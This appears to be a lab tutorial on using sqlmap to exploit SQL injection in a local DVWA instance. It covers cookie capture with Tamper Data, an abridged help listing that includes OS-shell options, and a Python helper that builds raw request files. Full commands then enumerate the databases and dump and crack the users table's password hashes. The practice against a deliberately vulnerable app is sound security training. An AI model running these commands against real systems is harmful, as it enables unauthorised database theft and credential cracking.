sqlmap (1)

sqlmap is an open-source command-line tool that automates the detection and exploitation of SQL injection. It supports the major database back ends (MySQL, PostgreSQL, Microsoft SQL Server, Oracle and others) and can enumerate and dump their contents once an injection point is confirmed.

1. Start XAMPP (the Apache/MySQL stack that hosts DVWA).


2. The target is DVWA with the security level set to medium. For sqlmap the steps are identical at low, medium and high: the only thing that changes is the security= value carried in the cookie. Whether a given level is actually injectable depends on the input filtering of the DVWA version you run.

3. Start the Tamper Data Firefox add-on (Tools -> Tamper Data) so the next request is intercepted.

4. Submit the SQL injection form (User ID = 1) so Tamper Data captures the request.

5. Tamper Data shows the request headers. The Cookie line is what matters: it carries the DVWA security level and the PHPSESSID of the logged-in session, and sqlmap has to send both or DVWA redirects every request to the login page.

Host=127.0.0.1
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept=*/*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit
Cookie=security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454

6. Run sqlmap from a terminal.

Abridged output of sqlmap -h (the basic help; -hh lists every option):

root@kali:~# sqlmap -h
Usage: python sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (0-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target

  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'
root@kali:~#

Enumerate the databases (--dbs). The URL is single-quoted so the shell does not treat the & as a background operator, and the cookie is copied verbatim from the captured request. Without -p, sqlmap tests both the id and Submit parameters; -p id restricts it to the one that matters:

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' --dbs

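Copying the cookie by hand works, but the more reliable way to hand sqlmap a captured request is sqlmap's -r option, which reads a raw HTTP request from a file and takes the headers, cookie and parameters from it. The following helper, added here as an example and not part of the original post, converts the Name=Value header dump that Tamper Data shows into such a file. The header dump below is constructed from the one on this page; the target URL is the one used in the sqlmap commands, and the Host line is taken from that URL rather than from the dump so the two cannot disagree (the Referer on this page says 127.0.0.1 over https while the commands use http://localhost).

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the Name=Value header dump Tamper Data shows for the
# DVWA request on this page. Reproduced here for the example, not captured anew.
TAMPER_DUMP = """\
Host=127.0.0.1
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept=*/*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit
Cookie=security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454
"""

# Assumed target: the URL the sqlmap commands on this page use.
TARGET_URL = "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit"


def parse_tamper_dump(dump):
    """Parse 'Name=Value' lines into an ordered list of (name, value) pairs.
    Split on the first '=' only: cookie and query values contain '=' as well."""
    headers = []
    for line in dump.splitlines():
        line = line.strip()
        if not line or "=" not in line:
            continue
        name, value = line.split("=", 1)
        headers.append((name.strip(), value.strip()))
    return headers


def session_cookie(headers):
    """Return the Cookie header value, or None if the dump carries no cookie.
    A DVWA request without a logged-in PHPSESSID is redirected to login.php,
    so sqlmap would end up testing the login page instead of sqli/."""
    for name, value in headers:
        if name.lower() == "cookie":
            return value
    return None


def security_level(cookie_value):
    """Extract DVWA's security level (low/medium/high) from the cookie value."""
    match = re.search(r"(?:^|;\s*)security=([^;]+)", cookie_value or "")
    return match.group(1) if match else None


def build_raw_request(url, headers, drop=("Accept-Encoding",)):
    """Render a raw HTTP/1.1 GET request in the form sqlmap -r reads.
    Host comes from the URL, not from the dump. Accept-Encoding is dropped so
    the responses sqlmap compares are plain text rather than gzip bodies."""
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    skip = {"host"} | {name.lower() for name in drop}
    lines = [f"GET {target} HTTP/1.1", f"Host: {parts.netloc}"]
    for name, value in headers:
        if name.lower() in skip:
            continue
        lines.append(f"{name}: {value}")
    # A raw request ends with an empty line; sqlmap needs the terminator.
    return "\r\n".join(lines) + "\r\n\r\n"


if __name__ == "__main__":
    hdrs = parse_tamper_dump(TAMPER_DUMP)
    cookie = session_cookie(hdrs)
    if cookie is None or "PHPSESSID" not in cookie:
        raise SystemExit("no PHPSESSID in the capture: log in to DVWA first")
    with open("dvwa-sqli.req", "w") as fh:
        fh.write(build_raw_request(TARGET_URL, hdrs))
    print(f"security level: {security_level(cookie)}")
    print("run: sqlmap -r dvwa-sqli.req -p id --dbs")
```

With the request file written, sqlmap -r dvwa-sqli.req -p id --dbs replaces the -u/--cookie pair in the commands on this page; every later command keeps the same -r dvwa-sqli.req prefix and only the enumeration options change.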
List the tables of the dvwa database (-D dvwa --tables):

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' -D dvwa --tables

List the columns of the users table (-T users --columns):

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' -D dvwa -T users --columns

Dump the rows of the users table (--dump; --columns is redundant here, because --dump enumerates the columns itself):

sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' -D dvwa -T users --columns --dump

With --dump, sqlmap retrieves every user account name and password hash stored in the back-end database. DVWA keeps unsalted MD5 hashes in the users table; when sqlmap recognises a dumped column as hashes, it offers to crack them with its built-in dictionary attack, so the plaintext passwords usually come out of the same run. Results are also cached under ~/.sqlmap/output/<host>/, which is why a repeated run replays earlier findings unless --flush-session is given.